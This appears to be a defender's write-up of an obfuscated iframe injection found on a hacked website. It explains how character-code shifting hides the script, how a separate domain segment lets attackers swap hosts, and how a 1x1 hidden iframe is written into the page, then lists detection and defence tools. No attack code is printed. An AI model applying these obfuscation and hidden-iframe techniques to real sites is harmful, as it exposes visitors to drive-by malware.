Below is a real iframe attack found on an exploited website.
It is rare that attack will be found in such readable form. In fact it is usually all put onto a single line, I simply broke it out into a more readable format. In some cases it is easy to find this code because it is by far the longest line in page. Regardless, below is the simple flow of this code works.
1. Initialize variables k1, k2, t1,t2, and h.
2. Deobfuscate k1 and k2
3. Write h to the user
Resulting deobfuscated code (*note that the frame is set to be virtually invisible 1×1 pixel)
The while Loops are relatively unimportant as they are merely deobfuscating the k1 and k2 variables and adding the deobfuscated information to the h string. In order to do this the attacker is using two predefined functions, the “String.FromCharCode()” function and the charCodeAt() attribute of the k1 string.
String.FromCharCode() is a function that returns the characters that correspond to the ISO-Latin-1 numerical position passed to the function. E.G. String.FromCharCode(65) = A
A reference sheet for ISO-Latin-1 characters and their numeric position can be viewed here.
In order to get the proper position to insert into the String.FromCharCode() the attack code first converts the current ISO-Latin-1 character into it’s corresponding position. This is done by using the string attribute charCodeAt() function. The while loops add a small amount of complication to this action by shifting the ISO-Latin-1 character position by -3 and -2.
Adding To the String
In the attack code (between the while loops), there is a simple addition to the string that adds the domain to the actual attack. There is no way to determine this is the domain until after the code is deobfuscated. The reason this is segmented in the code is because the attacker can quickly change the domain of the attack while preserving the overall attack extension.
Putting it All Together
The attack code finishes up by writing the document to the victim with the document.write() function. This is important to recognize because by the time the variable k1 reaches this function, it is deobfuscated. Therefore, an analyst can simply change this function to be none malicious in order to see what is actually obfuscated in the code. For example instead of document.write() one could use document.alert()
Detecting/Defending Against These Attacks
Some anti-virus and anti-malware solutions flag and stop these attacks from affecting end-users. Unfortunately however, research points to the fact that very few are actually capable of detecting these attacks.? I rolled this attack up into an HTML file and submitted it to virus total where 41 anti-virus/anti-malware scanners assessed the file. Of those 41 scanners, only three detected there was an issue.
Browser Protection Software:
- Trusteer Browser Protection Software
- Kace Browser Protection Software
- HP/Symantec/Mozilla Browser Sandboxing Software
- Various Virtual Browser Sandboxing Solutions
Content Filtering Technology
Content filtering technology could help in two ways, first it could detect the issue on the page to begin with and proactively categorize the page to preven tthe victim from accessing the attack code. Second, if the attack code is delivered to the victim the content filtering system could still prevent the victim from actually accessing the malicious website hosting the exploit and malware.
Example Content Filtering System Software:
- BlueCoat WebFilter
- WebSense WebFilter
- ScanSafe WebFilter/Malware Scanner
- Many many other
Intrusion Prevention Systems can be used to block the exploit from getting to the victim. Unfortunately, in many cases the actual prevention is often based on the exploit and not the vulnerability. This means that the exploit can be altered to bypass the IPS fairly easily by altering the signature and/or behavior of the attack. Of course finely tuned and sophisticated IPS’ have less issues with this.
- Sourcefire SNORT
- IBM Internet Security Systems Proventia
- McAfee Network Security Platform (formerly Intrushield IPS)
- TippingPoint Digital Vacine
- Many many others